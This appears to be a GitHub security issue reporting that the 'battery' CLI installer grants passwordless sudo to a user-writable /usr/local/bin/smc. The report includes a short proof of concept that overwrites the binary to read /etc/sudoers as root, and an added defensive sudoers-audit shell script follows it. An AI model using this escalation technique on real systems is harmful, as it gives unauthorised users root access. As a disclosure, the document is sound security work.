Security issue: CLI install script allows for local privilege escalation #443
Open
Description
Summary
Installing by following 'Option 3: install ONLY the command line interface' creates a security hole on the system that allows code executed with the installing user's permissions to gain superuser permissions.
The install script here creates a sudoers.d entry that allows any user to execute /usr/local/bin/smc as superuser.
This would be fine in itself, but the install script also installs /usr/local/bin/smc as user-writable.
Sample PoC:
First, install normally
milo@Michaels-MacBook-Air:~/battery$ curl -s https://raw.githubusercontent.com/actuallymentor/battery/main/setup.sh > setup.sh
milo@Michaels-MacBook-Air:~/battery$ chmod u+x setup.sh
milo@Michaels-MacBook-Air:~/battery$ ./setup.sh
####################################################################
# 👋 Welcome, this is the setup script for the battery CLI tool.
# Note: this script will ask for your password once or multiple times.
####################################################################
🔋 Starting battery installation
[ 1 ] Superuser permissions acquired.
[ 2 ] Downloading latest version of battery CLI
[ 3 ] Move smc to executable folder
[ 4 ] Writing script to /usr/local/bin/battery for user milo
[ 5 ] Setting correct file permissions for milo
[ 6 ] Setting up visudo declarations
01/31/26-12:52:49 - Setting visudo file permissions to milo
Visudo file updated successfully
[ 7 ] Removing temp folder /Users/milo/.battery-tmp
🎉 Battery tool installed. Type "battery help" for instructions.
Create a sample script that can perform privilege escalation
milo@Michaels-MacBook-Air:~/battery$ vim sample-evil-script.sh
milo@Michaels-MacBook-Air:~/battery$ chmod u+x sample-evil-script.sh
milo@Michaels-MacBook-Air:~/battery$ cat sample-evil-script.sh
echo -e "#!/bin/bash\ncat /etc/sudoers | wc" > /usr/local/bin/smc
sudo /usr/local/bin/smc -k CH0B -w 02
milo@Michaels-MacBook-Air:~/battery$ ./sample-evil-script.sh
64 250 1709
Suggested mitigation
Don't install these binaries as user-writable. But, I haven't looked into the rest of the repo so I don't know what other changes this would entail.
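A defensive check for the condition reported above (a sudoers rule whose command path, or its directory, can be modified by a non-root user), as an added example that is not part of the original issue or of the battery project's code. The function names and the `TRUSTED_UID` variable are hypothetical, and paths are assumed to contain no whitespace.

```shell
#!/bin/sh
# Added example: flag sudoers command paths that a non-trusted user can replace.
# Limitations: no backslash line continuations, no whitespace in paths.
TRUSTED_UID="${TRUSTED_UID:-0}"   # assumption: only this uid may own sudo targets

# Print each absolute command path named in a sudoers-style file.
sudo_command_paths() {
  awk '
    /^[[:space:]]*#/ { next }                 # skip comments and #include lines
    index($0, "=") {
      rhs = substr($0, index($0, "=") + 1)
      gsub(/\([^)]*\)/, "", rhs)              # drop Runas specs such as (root)
      n = split(rhs, parts, ",")
      for (i = 1; i <= n; i++) {
        p = parts[i]
        gsub(/[A-Z_]+:/, "", p)               # drop tags such as NOPASSWD:
        sub(/^[[:space:]]+/, "", p)
        split(p, words, /[[:space:]]+/)
        if (words[1] ~ /^\//) print words[1]  # first word is the command
      }
    }' "$1" | sort -u
}

# Return 0 (and print the reason) if the path or its directory is owned by
# someone other than TRUSTED_UID or is group/world-writable.
is_replaceable() {
  for p in "$1" "$(dirname "$1")"; do
    [ -e "$p" ] || continue
    if [ -n "$(find -L "$p" -prune \
         \( ! -user "$TRUSTED_UID" -o -perm -020 -o -perm -002 \) -print)" ]; then
      echo "replaceable: $p (needed by sudo rule for $1)"
      return 0
    fi
  done
  return 1
}

# Audit one sudoers file; returns non-zero if any command path is replaceable.
audit_sudoers() {
  rc=0
  for path in $(sudo_command_paths "$1"); do
    if is_replaceable "$path"; then rc=1; fi
  done
  return "$rc"
}

# Usage: sh audit.sh <readable copy of a sudoers.d file>
if [ "$#" -gt 0 ]; then audit_sudoers "$1"; fi
```

The directory is checked as well as the file because a user who can write to the directory can rename the binary and put another file in its place.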